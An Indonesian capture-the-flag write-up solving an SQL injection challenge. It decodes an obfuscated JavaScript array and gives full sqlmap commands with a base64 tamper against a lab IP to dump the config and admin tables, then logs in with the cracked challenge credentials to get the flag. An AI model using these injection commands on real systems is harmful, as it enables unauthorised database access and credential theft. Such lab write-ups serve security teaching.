SQLI Capture Amerika Serikat (Lorem Ipsum)
Summary:
Di dapati sebuah web yang terlihat hanya web biasa, hanya terdapat data dummies yaitu lorem ipsum,
Solved:
Dengan CTRL + U kemudian saya fokus ke
Variabel _0x9b7e
Var_0x9b7e=["\x41\x42\x43\x44\x45\x46\x47\x48\x49\x4A\x4B\x4C\x4D\x4E\x4F\x50\x51\x52\x53\x54\x55\x56\x57\x58\x59\x5A\x61\x62\x63\x64\x65\x66\x67\x68\x69\x6A\x6B\x6C\x6D\x6E\x6F\x70\x71\x72\x73\x74\x75\x76\x77\x78\x79\x7A\x30\x31\x32\x33\x34\x35\x36\x37\x38\x39\x2B\x2F\x3D","","\x63\x68\x61\x72\x43\x6F\x64\x65\x41\x74","\x63\x68\x61\x72\x41\x74","\x5F\x6B\x65\x79\x53\x74\x72","\x6C\x65\x6E\x67\x74\x68","\x72\x65\x70\x6C\x61\x63\x65","\x69\x6E\x64\x65\x78\x4F\x66","\x66\x72\x6F\x6D\x43\x68\x61\x72\x43\x6F\x64\x65","\x6E","\x64\x61\x74\x61\x2E\x70\x68\x70","\x68\x74\x6D\x6C","\x23\x6E\x65\x77\x73\x5F\x69\x64","\x63\x6C\x69\x63\x6B","\x69\x64","\x61\x74\x74\x72","\x65\x6E\x63\x6F\x64\x65","\x23\x6E\x65\x77\x73\x5F\x63\x6F\x6E\x74\x65\x6E\x74","\x70\x6F\x73\x74","\x6F\x6E","\x61","\x67\x65\x74","\x72\x65\x61\x64\x79"]
Kemudian saya mencoba untuk mendecode ke Hexa dengan menggunakan Hackbar Modif Hex to Char
Dan menghasilkan
ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789 + / = charCodeAtcharAt_keyStrlengthreplaceindexOffromCharCoden data.php html #news_id clickidattrencode#news_contentpostonagetready
Saya terfokus pada news_id sama data.php Kemudian saya menggunakan SQLmap untuk melakukan SQLinjection dibagian data.php dan dikarenakan random huruf Abjad dan Angka, ada charCodeAtcharAt_keyStrlengthreplaceindexOffromCharCoden saya berfikir biasanya SQL Injection itu ada yang base-64 sehingga saya mencoba dengan
saya mencoba untuk melihat di burp suite dan saya klik salah satunya saya mendapatkan sedikut cule yaitu terdapat ID yang menggunakan nilai sebagai base64
kemudian saya mencoba melakukan teknik blind sql injection dengan menggunakan SQLmap
python sqlmap.py -u "http://35.187.236.126:8013/data.php" --data="id=1" --tamper=base64encode --dbs –random-agent
dan hasilnya adalah sebagai berikut
dan benar saja Vuln SQL injetion kemudian saya melakukan SQL injection untuk mencari nama databasenya di ada dengan Bruteforce punya SQLmap kemudian saya mencari table yang ada di dalam database tersebut
python sqlmap.py -u "http://35.187.236.126:8013/data.php" --data="id=1" --tamper=base64encode --dbs --random-agent --tables
dan di dapat 3 table dengan nama sebagai berikut
kemudian saya mencoba untuk dump di bagian config dengan menggunakan
python sqlmap.py -u "http://35.187.236.126:8013/data.php" --data="id=1" --tamper=base64encode --dbs --random-agent -T config –dump
dan hasilnya sebagai berikut
dan ternya itu menyiman url dari adminya yaitu /1n1admbr0
kemudian saya dump data tabel n1mbusadmin dengan menggunakan seperti di bawah ini
python sqlmap.py -u "http://35.187.236.126:8013/data.php" --data="id=1" --tamper=base64encode --dbs --random-agent -T n1mbusadmin –dump
kemudian saya mendapatkan hasil setelah brutefoce password menggunakan wolrdlist dari SQLmap sendiri dan saya mendapatkan sebagai berikut
Kemudian saya mencoba membuka url tersebut di http://35.187.236.126:8013/1n1admbr0/
dan saya masukan user backupuser dan password linkinpark kemudian saya login dan mendownload flag tersebut
kemudian saya download flag tersebut dan mendapatakan flag tersebut
setelah saya download kemudian saya mendapatkan flag tersebut flag tersebut adalah
dan Flagnya adalah
B2P{af39e6e718f3fb8f2de9ae9e6464b150}